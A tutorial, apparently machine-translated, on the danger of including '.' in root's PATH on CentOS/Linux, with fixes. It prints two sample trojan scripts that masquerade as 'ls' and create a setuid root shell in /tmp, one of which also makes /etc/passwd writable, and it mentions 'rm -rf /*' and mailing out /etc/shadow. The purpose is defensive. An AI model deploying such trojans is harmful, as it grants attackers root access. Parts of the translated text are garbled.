How do CentOS environment variables set security issues?


Represents the current directory. If you write this to the root environment variable, when you execute the script, you only need to type the name of the script, and the system will find the script in the current directory and execute it.

For example, when a U disk is inserted into a computer and you type a file name, the system will execute the file on the U disk. If there is a Trojan horse program, it will also be executed, such as rm-rf/* in the script, and your system will be deleted.

Imagine a person writing an executable program called ls in a directory he can write. The program sends the / etc / shadow file to a mailbox, and root happens to be in that directory. Imagine what happens under ls?

Therefore, many Unix systems with high security requirements even require commands to be invoked in absolute paths.

This paper mainly describes the problems caused by’. ‘in the environment variable PATH of LINUX, and several methods to solve them.

As many people know, there is a list of directories in the $PATH environment variable. When a user wants to execute a program, the system will search the location of the program according to the contents of the list. When the program name is not preceded by a slash. / When $PATH works.

By default, “…” is not included in $PATH for regular users and root users to specify the user’s current directory. This is inconvenient for programmers who develop scripts locally. People who want to save money add points to the search path, which is tantamount to burying dangers in your system.

For example, root adds a dot at the end of his current path for ease of use. (The search directory represents the current directory)

The command operation is as follows:

[[email protected] root]# PATH=$PATH:.

[[email protected] root]# echo $PATH


It’s convenient to enter the script name directly to execute. OK, under normal circumstances, there is no problem at all, and it also saves the trouble of typing. / foo. sh (foo. SH is my hypothetical script file name). Some roots add PATH=$PATH:. This command to the profile so that all users can share the “Gospel” you bring to them. The more successful root user is PATH =. $PATH (adding “:” to the path is another form). Normally, there was no problem until one day, Zhang Sanyu put a script named LLS in his home directory and told Root that his system had problems and hoped Root could help him solve them. (Actually, it’s a trap). Root sums up as administrator privileges and lists directories more closely. Maybe the administrator typed LLS by mistake, and the result was haha…

Here’s a simple example of a C shell


If ( ! -o /bin/su )

goto finish

cp /bin/sh /tmp/.sh

chmod 7777 /tmp/.sh

finish :

exec /bin/ls $argv | grep -v ls

There’s a B shell with a slight distortion.


if chmod 666 /etc/passwd > /dev/null 2>&1 ;then

cp /bin/sh /tmp/.sh

chmod 4755 /tmp/.sh


exec ls “[email protected]

If root includes’. ‘in its environment variable, $PATH, and its location is first in the system directory where LS resides, then when the user executes ls in / tmp, the script given above is executed, not the actual LS command, because LS is ultimately executed, so root will not see any exceptions. If root executes the script, it sets the password file writable, copies the shell to / TMP and saves it as. sh, and sets its setuserid bit, all of which happens very quietly.

In the above two programs, the ghost-free person can write any program that causes root to jump out of the building in a hurry, such as the trap of the subordinate to drill, and maybe root will not even be aware of it when it is implemented unconsciously. Maybe there is a script named PS in Zhangsan’s home directory, which contains dangerous scripts. Root may enter PS before his machine. At this time, the system will first search under the current directory, but the result / SBIN / PS is not executed. There are many tricks like this.

Administrator comrade, don’t be too nervous, let me talk about the solution.

First of all, we should develop a good command line input habit of losing absolute paths, so that “illegal elements” will not be allowed to enter the empty space. For example, the column directory is better to use / bin / LS to list the directory, not to enter LS easily.

Secondly, root should not include “…” in the list of search directories, while ordinary users should put “…” at the end of the list of search directories if a “…” is included in the list of search directories. In this way, ordinary users will not be harmed by the kind mentioned above.

Finally, you can add the following line at the end of the / etc / profile and bashrc. profile files when you log in

[PATH=`echo $PATH |sed -e ‘s/::/:/g; s/:.:/:/g; s/:.$//; s/^://’ `

This simple sed command deletes all “…” in the path, including its other form “:”.

It can also be called by crontab to execute periodically

#find / ! -fstype proc ‘(‘ -name ‘.??*’ -o -name ‘.[^.]’ ‘)’ > point.txt ; mail -s ‘this is a pointlist’ [email protected] < point.txt

To search all the files that start with the dot, send them to the mailbox of root, and then compare them.